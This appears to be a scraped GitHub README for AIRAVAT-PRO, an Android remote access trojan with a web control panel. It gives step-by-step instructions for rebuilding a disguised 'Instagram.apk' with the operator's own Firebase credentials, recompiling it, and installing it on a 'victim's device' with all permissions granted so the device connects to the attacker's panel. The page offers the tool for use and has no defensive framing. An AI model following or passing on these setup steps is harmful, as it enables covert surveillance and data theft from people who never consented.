alvinbaby / AIRAVAT-PRO

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

AIRAVAT PRO

AIRAVAT-PRO

Apk error fix 🥰

Video


Requirements

Android RAT

[*] Don't forget to add firebase url in smali_classes3/lizord/demon/MainActivity.smali search for databaseURL and change it to your database url

AIRAVAT-PRO
  1. Download Instagram.apk
  2. Decompile it using any Decompiler recommend above.
  3. Now open res/values/strings.xml file.
  4. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
    • Example
      <string name="firebase_database_url">https://your_database_url.firebase.com</string>
      <string name="google_api_key">your_api_key</string>
      <string name="google_app_id">your_app_id</string>
      <string name="google_storage_bucket">your_storage_bucket_url</string>
      <string name="project_id">project_id</string>
  5. Now compile the code with appt2.
  6. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.
AIRAVAT-PRO AIRAVAT-PRO

New version coming soon👇

AIRAVAT-PRO

❤️Supporters❤️

*https://github.com/Th30neAnd0nly

*https://github.com/AIRAVAT-pro

About


Languages

Language:JavaScript 61.7%Language:HTML 21.5%Language:CSS 16.8%